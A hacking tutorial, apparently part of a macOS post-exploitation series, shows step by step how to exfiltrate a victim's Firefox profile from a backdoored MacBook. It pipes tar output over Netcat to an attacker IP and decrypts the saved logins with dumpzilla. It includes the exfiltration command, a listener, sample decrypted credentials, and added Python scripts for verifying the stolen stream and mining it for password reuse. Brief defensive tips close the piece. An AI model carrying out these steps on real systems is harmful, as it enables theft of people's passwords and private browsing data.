Passwords and data stored in web browsers are extremely valuable to hackers. Even when there is no financial gain to be made, black hat hackers may still pass your passwords and personal information around for amusement. Never underestimate what you're worth to a hacker.
While I'm certainly not new to this, it has been an interesting experience discovering fun ways to perform post-exploitation attacks from a backdoored MacBook. So far, I've been surprised to learn how easy it is to abuse tools built into macOS, or to install third-party software, to further compromise a Mac.
Continuing this series on hacking macOS, this time I'll show how hackers can easily exfiltrate sensitive Firefox directories and extract the passwords in them with dumpzilla, a comprehensive browser forensics tool. Black hats may benefit from this knowledge, but so will white hats, pentesters and other ethical hackers. Ordinary Mac users will also learn how everyday habits such as saving passwords in the browser can put them at risk.
Readers should be aware that this attack was performed from a low-privilege backdoor (no admin access) against Firefox 60 on macOS 1
Step 1: Install the Dependencies
To start, on the Kali system, install a few packages with pip, the package manager for installing and managing Python packages. dumpzilla needs these to run. The full command is pip install logging lz4. Note that logging is part of Python's standard library, so only lz4 actually needs installing; make sure it ends up in the same interpreter dumpzilla will be run with (python3 -m pip install lz4 if pip points at Python 2).
pip install logging lz4

Collecting logging
  Downloading https://files.pythonhosted.org/packages/93/4b/979db9e44be09f71e85c9c8cfc42f258adfb7d93ce01deed2788b2948919/logging-0.4.9.6.tar.gz (96kB)
    100% |████████████████████████████████| 102kB 69kB/s
Building wheels for collected packages: logging
  Running setup.py bdist_wheel for logging ... done
  Stored in directory: /root/.cache/pip/wheels/7d/2e/cb/a51fbdf351b2efebcf857f8b2c8d59b6ccd44ea2e9bb4005d6
Successfully built logging
Installing collected packages: logging
Successfully installed logging-0.4.9.6
There are a few more dependencies that I found easier to install with APT. Enter apt-get install python3 sqlite3 python-lz4 libnss3*. The libnss3 package provides the NSS library that dumpzilla uses to decrypt the stored logins; python-lz4 is the Python 2 binding, so if dumpzilla is run with python3 the lz4 module installed in Step 1 is the one that matters.
apt-get install python3 sqlite3 python-lz4 libnss3*

Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
  sqlite3-doc
The following NEW packages will be installed:
  python-lz4 sqlite3
0 upgraded, 2 newly installed, 0 to remove and 274 not upgraded.
Need to get 879 kB of archives.
After this operation, 2,591 kB of additional disk space will be used.
Get:1 https://mirrors.dotsrc.org/kali kali-rolling/main amd64 python-lz4 amd64 0.10.1+dfsg1-0.2 [16.6 kB]
Get:2 https://mirrors.dotsrc.org/kali kali-rolling/main amd64 sqlite3 amd64 3.23.1-1 [863 kB]
Fetched 879 kB in 15s (60.0 kB/s)
Selecting previously unselected package python-lz4.
(Reading database ... 181720 files and directories currently installed.)
Preparing to unpack .../python-lz4_0.10.1+dfsg1-0.2_amd64.deb ...
Unpacking python-lz4 (0.10.1+dfsg1-0.2) ...
Selecting previously unselected package sqlite3.
Preparing to unpack .../sqlite3_3.23.1-1_amd64.deb ...
Unpacking sqlite3 (3.23.1-1) ...
Setting up python-lz4 (0.10.1+dfsg1-0.2) ...
Setting up sqlite3 (3.23.1-1) ...
Processing triggers for man-db (2.8.3-2) ...
Step 2: Downloading dumpzilla
With the required packages installed, download dumpzilla.
At the time of writing, the latest version of dumpzilla has a bug that prevents it from decrypting the passwords stored in Firefox. Fortunately, GitHub keeps the history of every commit, so older versions can be fetched at any time.
In future versions of dumpzilla it should be possible to simply clone the repository and follow along with this article. For now, readers should download this specific version of dumpzilla with the following wget command. This version has been tested and decrypts the passwords saved in Firefox as expected.
wget 'https://github.com/Busindre/dumpzilla/archive/b3075d1960874ce82ea76a5be9f58602afb61c39.zip'
Step 3: Unzip dumpzilla
Wget saves a new file named b3075d1960874ce82ea76a5be9f58602afb61c39.zip. The compressed dumpzilla files inside it can be extracted with the command unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip.
unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip

Archive:  b3075d1960874ce82ea76a5be9f58602afb61c39.zip
b3075d1960874ce82ea76a5be9f58602afb61c39
   creating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/
   creating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/addinfo.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/addons.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/bookmarks.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/cert_override.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/cookies.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/downloads_dir.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/downloads_history.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/exceptions.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/extensions.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/forms.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/history.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/offlinecache.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/passwords.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/permissions.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/session.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/thumbnails.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/README.md
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/dumpzilla
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/dumpzilla.py
After extracting dumpzilla, change into the newly created directory "dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/" with the cd command.
cd dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/
Step 4: Set the File Permissions
Then use chmod to make sure dumpzilla.py is allowed to execute in Kali. (This is only strictly needed to run ./dumpzilla.py directly; the python3 dumpzilla.py form used later works without it.)
chmod +x dumpzilla.py
Step 5: Start the Netcat Listener
With dumpzilla set up, start a Netcat listener to receive the Firefox directories sent from the backdoored MacBook.
nc -l -p 9999 | tar x
This command tells Netcat to listen (-l) on port (-p) 9999 and pipe (|) the incoming data into the tar command. Tar is a command-line archiving utility available on both Kali and macOS. The x argument tells tar to extract, so the archive (the bundled directories) arriving over the Netcat pipe is unpacked on the spot. The directory is packed into a single archive for the transfer so that Netcat handles one continuous stream rather than many separate files. Two practical notes: some Netcat builds reject -p together with -l, in which case nc -l 9999 does the same job; and the transfer is neither encrypted nor authenticated, so anyone on the network path can read the profile in transit.
That takes care of downloading dumpzilla and configuring Netcat to receive the Firefox data. Next, I'll show how to exfiltrate entire Firefox directories from the backdoored MacBook.
Step 6: Exfiltrate Backdoored MacBook Directories
Some readers will be aware that Firefox can manage multiple profiles. Profiles are typically used by more experienced users who want to keep their work, school and personal browsing history, bookmarks and cookies separate.
In general, most Firefox users have a single "default" profile. On macOS, profiles are stored in the directory below.
/Users/<username>/Library/Application Support/Firefox/Profiles/
For example, if Bob's MacBook is compromised by a malicious PDF while he is logged in to his account, the attacker will not be able to see Firefox profiles belonging to other user accounts on the MacBook. At least not without privilege escalation, which is beyond the scope of this article.
On the other hand, if the target MacBook were physically compromised, the attacker would likely have full root (administrator) access to every account and Firefox profile.
Since the intent is to exfiltrate the Firefox profile of a single account only, connect to the backdoored MacBook for the next commands.
Change into the Firefox directory of the target account with cd (replace <username> with that account's name).
cd '/Users/<username>/Library/Application Support/Firefox/'
Then use the following tar command to bundle (c) the Profiles/ directory (and everything in it) into an archive written to standard output (f -) and pipe (|) the data straight into Netcat (nc). The attacker's system is represented by the IP address 18.104.22.168, so be sure to replace it with the VPS or local IP address the attacker actually uses.
tar cf - Profiles/ | nc 18.104.22.168 9999
While Netcat transfers the directory, the terminals may appear to have frozen or stalled. Exfiltrating a Firefox profile containing only 12 hours of stored data took about two minutes to complete; a profile with months of browsing history, months of cookies and hundreds of bookmarks could take much longer. Be patient here. Netcat performs no integrity check of its own, so if any data in the directories is corrupted while being exfiltrated to the Kali system, the passwords stored in the Firefox profile may no longer be decryptable.
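The corruption risk just mentioned exists because Netcat has no integrity check. The following script is an added example, not code from the original article or from dumpzilla: it packs a Profiles/ directory into a tar stream the way tar cf - does, records the stream's SHA-256 for the sender to read out on its own terminal, and on the receiving side refuses to extract a stream whose hash does not match. The profile tree it builds (one 9kwbffy3.default directory holding a stub logins.json and key4.db) is constructed for the demo, and the receiver-side path check is an extra precaution of the example rather than part of the article's procedure.

```python
"""Added example (not from the original article or from dumpzilla): hash-verified
tar round trip for an exfiltrated Firefox Profiles/ directory.

Sender side equivalent:   tar cf - Profiles/ | nc ATTACKER 9999   (plus the hash)
Receiver side equivalent: nc -l -p 9999 | tar x                   (plus the check)
The profile tree below is constructed; the key4.db content is a placeholder."""
import hashlib
import io
import os
import tarfile
import tempfile


def build_demo_profile(root):
    """Create a constructed Profiles/ tree like the one the article exfiltrates."""
    profile = os.path.join(root, "Profiles", "9kwbffy3.default")
    os.makedirs(profile)
    with open(os.path.join(profile, "logins.json"), "w") as fh:
        fh.write('{"nextId": 1, "logins": []}')  # constructed, holds no real logins
    with open(os.path.join(profile, "key4.db"), "wb") as fh:
        fh.write(b"constructed placeholder, not a real NSS key database")
    return os.path.join(root, "Profiles")


def pack_dir(src_dir):
    """Equivalent of `tar cf - DIR`: return (tar_bytes, sha256_hex).

    The sender shows the hex digest out of band (on its own terminal) so the
    receiver has a value to compare the arrived stream against."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        tar.add(src_dir, arcname=os.path.basename(os.path.normpath(src_dir)))
    data = buf.getvalue()
    return data, hashlib.sha256(data).hexdigest()


def verify_and_extract(tar_bytes, expected_sha256, dest_dir):
    """Receiver side: extract only if the stream hashes as expected.

    Returns the member names that were extracted; raises ValueError otherwise."""
    actual = hashlib.sha256(tar_bytes).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"integrity check failed: expected {expected_sha256}, got {actual}")
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        members = tar.getmembers()
        # The compromised host is not trusted to send well-behaved paths either.
        for m in members:
            if m.name.startswith("/") or ".." in m.name.split("/"):
                raise ValueError(f"unsafe path in archive: {m.name}")
        # Use tarfile's "data" filter where this Python has it (3.12+, and the
        # backports to 3.8.17/3.9.17/3.10.12/3.11.4); older versions lack it.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest_dir, **kwargs)
        return [m.name for m in members]


def demo():
    """Round-trip a constructed profile, then show that one flipped byte is caught."""
    root = tempfile.mkdtemp(prefix="ff-exfil-demo-")
    src = build_demo_profile(root)
    data, digest = pack_dir(src)
    members = verify_and_extract(data, digest, os.path.join(root, "kali"))
    restored = os.path.isfile(
        os.path.join(root, "kali", "Profiles", "9kwbffy3.default", "logins.json"))
    # Simulate corruption in transit: flip a single byte in the middle of the stream.
    mid = len(data) // 2
    corrupted = data[:mid] + bytes([data[mid] ^ 0xFF]) + data[mid + 1:]
    try:
        verify_and_extract(corrupted, digest, os.path.join(root, "bad"))
        tamper_detected = False
    except ValueError:
        tamper_detected = True
    return {"sha256": digest, "members": members,
            "logins_restored": restored, "tamper_detected": tamper_detected}


if __name__ == "__main__":
    result = demo()
    print("stream sha256:", result["sha256"])
    for name in result["members"]:
        print("  extracted:", name)
    print("corruption detected:", result["tamper_detected"])
```

In practice the sender would run pack_dir and read the digest off its terminal, the receiver would save the raw Netcat stream to a file and pass it through verify_and_extract before pointing dumpzilla at the result; a mismatch means the transfer must be repeated rather than debugged at the password-decryption stage.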
Back on the Kali machine there will be a new Profiles/ directory containing at least one directory that follows the naming scheme xxxxxxxx.default/. By default, Firefox generates eight random characters (xxxxxxxx) and prepends them to the profile name. For example, a user with multiple profiles might have directories named "w9wuahzu.work/", "ei49j03w.personal/" and "r3h84t9t.default/". Each directory can be processed individually with dumpzilla.
To extract the passwords from a specific Firefox profile, use the command python3 dumpzilla.py Profiles/xxxxxxxx.default/ --passwords.
python3 dumpzilla.py Profiles/xxxxxxxx.default/ --passwords

============================================================================================
== Decode Passwords
============================================================================================
=> Source file: /tmp/dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/9kwbffy3.default/logins.json
=> SHA256 hash: 9df5b2c418bbb967e63b556162e6d11ed509a9a5c67580f3c79e089d954ade91

Web: https://www.facebook.com
Username: firstname.lastname@example.org
Password: DarkDante23

Web: https://accounts.google.com
Username: kevin.poulsen
Password: Porsche944

Web: https://www.reddit.com
Username: email@example.com
Password: DarkDante23

Web: https://www.amazon.com
Username: firstname.lastname@example.org
Password: DarkDante944

Web: https://login.live.com
Username: email@example.com
Password: DarkDante123

Web: https://www.netflix.com
Username: firstname.lastname@example.org
Password: Porsche944

Web: https://login.aliexpress.com
Username: Poulsen
Password: Jordan626

============================================================================================
== Total Information
============================================================================================
Total Decode Passwords: 7
Total Passwords: 7
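What the dump above gives an attacker, as an added example that is not part of the original article or of dumpzilla. First, logins.json is ordinary JSON in which only encryptedUsername and encryptedPassword are NSS-encrypted blobs (encType 1, which is what libnss3 is needed for), so the list of sites, the usage counts and the last-used times are readable without any decryption at all. Second, dumpzilla's --passwords output is plain text, so it can be grouped by password to find reuse across sites, the first thing an attacker pivots on. Both the logins.json content and the dumpzilla output inside the script are constructed to mirror the article's layout; the encrypted values are placeholders rather than real NSS ciphertext, the JSON carries only a subset of the fields a real file has, and the parser assumes usernames and passwords contain no whitespace.

```python
"""Added example, not part of the original article or of dumpzilla.

1. logins.json is plain JSON; only encryptedUsername/encryptedPassword are NSS
   blobs (encType 1), so sites, usage counts and timestamps need no decryption.
2. dumpzilla --passwords output is plain text; group it by password to see reuse.

Both inputs below are constructed for the demo (placeholders, not real NSS data)."""
import json
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed subset of a real logins.json. Firefox also stores guid, formSubmitURL,
# httpRealm, usernameField/passwordField and timePasswordChanged per entry.
# Timestamps are milliseconds since the Unix epoch, as Firefox writes them.
SAMPLE_LOGINS_JSON = json.dumps({"nextId": 3, "logins": [
    {"id": 1, "hostname": "https://www.facebook.com", "encType": 1,
     "encryptedUsername": "PLACEHOLDER-NSS-BLOB-1", "encryptedPassword": "PLACEHOLDER-NSS-BLOB-2",
     "timeCreated": 1527811200000, "timeLastUsed": 1530403200000, "timesUsed": 42},
    {"id": 2, "hostname": "https://accounts.google.com", "encType": 1,
     "encryptedUsername": "PLACEHOLDER-NSS-BLOB-3", "encryptedPassword": "PLACEHOLDER-NSS-BLOB-4",
     "timeCreated": 1527811200000, "timeLastUsed": 1527897600000, "timesUsed": 3},
]})

# Constructed to mirror the article's dumpzilla output (banner lines shortened).
SAMPLE_DUMP = """\
== Decode Passwords
=> Source file: Profiles/9kwbffy3.default/logins.json
Web: https://www.facebook.com
Username: firstname.lastname@example.org
Password: DarkDante23
Web: https://accounts.google.com
Username: kevin.poulsen
Password: Porsche944
Web: https://www.reddit.com
Username: email@example.com
Password: DarkDante23
Web: https://www.amazon.com
Username: firstname.lastname@example.org
Password: DarkDante944
Web: https://login.live.com
Username: email@example.com
Password: DarkDante123
Web: https://www.netflix.com
Username: firstname.lastname@example.org
Password: Porsche944
Web: https://login.aliexpress.com
Username: Poulsen
Password: Jordan626
Total Decode Passwords: 7
"""


def login_inventory(logins_json_text):
    """What logins.json reveals before any decryption, most-used login first."""
    rows = []
    for entry in json.loads(logins_json_text)["logins"]:
        last_used = datetime.fromtimestamp(entry["timeLastUsed"] / 1000, tz=timezone.utc)
        rows.append({"host": entry["hostname"],
                     "times_used": entry["timesUsed"],
                     "last_used": last_used.strftime("%Y-%m-%d"),
                     "enc_type": entry["encType"]})  # 1 = NSS SDR blob, needs libnss3
    return sorted(rows, key=lambda r: r["times_used"], reverse=True)


# One record = "Web: ..." then "Username: ..." then "Password: ...", on one line or three.
RECORD_RE = re.compile(r"Web:\s*(\S+)\s*Username:\s*(\S+)\s*Password:\s*(\S+)")


def parse_dumpzilla_passwords(text):
    """(site, username, password) triples from dumpzilla --passwords output."""
    return RECORD_RE.findall(text)


def find_password_reuse(text):
    """Passwords used on more than one site, mapped to the sorted list of those sites."""
    sites_by_password = defaultdict(list)
    for site, _user, password in parse_dumpzilla_passwords(text):
        sites_by_password[password].append(site)
    return {pw: sorted(s) for pw, s in sites_by_password.items() if len(s) > 1}


def password_families(text):
    """Group passwords that differ only by a trailing number (DarkDante23, DarkDante123 ...).

    Knowing one member lets an attacker guess the rest, so all of them need rotating."""
    families = defaultdict(set)
    for _site, _user, password in parse_dumpzilla_passwords(text):
        families[re.sub(r"\d+$", "", password)].add(password)
    return {stem: sorted(members) for stem, members in families.items()}


if __name__ == "__main__":
    for row in login_inventory(SAMPLE_LOGINS_JSON):
        print(f"{row['host']:<32} used {row['times_used']:>3}x, last {row['last_used']}")
    for pw, sites in find_password_reuse(SAMPLE_DUMP).items():
        print(f"reused password {pw!r}: {', '.join(sites)}")
    for stem, members in password_families(SAMPLE_DUMP).items():
        if len(members) > 1:
            print(f"password family {stem!r}: {', '.join(members)}")
```

On the article's own data the exact-match check flags DarkDante23 (Facebook and Reddit) and Porsche944 (Google and Netflix), and the family check additionally ties Amazon and Microsoft to the DarkDante pattern; a pentest report would list all of those accounts as compromised together, not just the two pairs.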
How to Protect Against Web Browser Attacks
Don't let this article put you off Firefox, or assume that Google Chrome is more secure. Google Chrome's stored data can be targeted with the same kind of attack described here. Rather than looking to the web browser for protection, make some small behavioral changes that make these attacks harder for hackers.
- Use private browsing mode. Dumpzilla can do far more than extract passwords from Firefox; it can also dump history, cookies, bookmarks, form data and session data. It's safer to use private browsing mode exclusively. While that can be annoying and makes browsing less convenient, entrusting so much data to the web browser is genuinely dangerous. Browser data dumps containing dozens of email addresses and passwords are freely traded in black hat hacking communities, and if hackers can't sell your data, they'll wreak havoc on your accounts simply because it's of no financial value to them.
- Use a master password. If saving passwords in Firefox is a convenience you don't want to give up, set a strong master password. It puts a modest obstacle in the attacker's way and may stop them from learning all of your passwords. Keep in mind that the exfiltrated key database can be brute-forced offline, so the protection is only as strong as the master password itself, and that it protects only the saved logins: history, cookies and the rest of the profile remain readable.
- Use a proper password manager. Password managers give stored passwords better protection. Hackers can still exfiltrate the password manager's database and brute-force it, but with a strong, unique master password the attacker has to spend weeks (or months) trying to crack the encrypted database.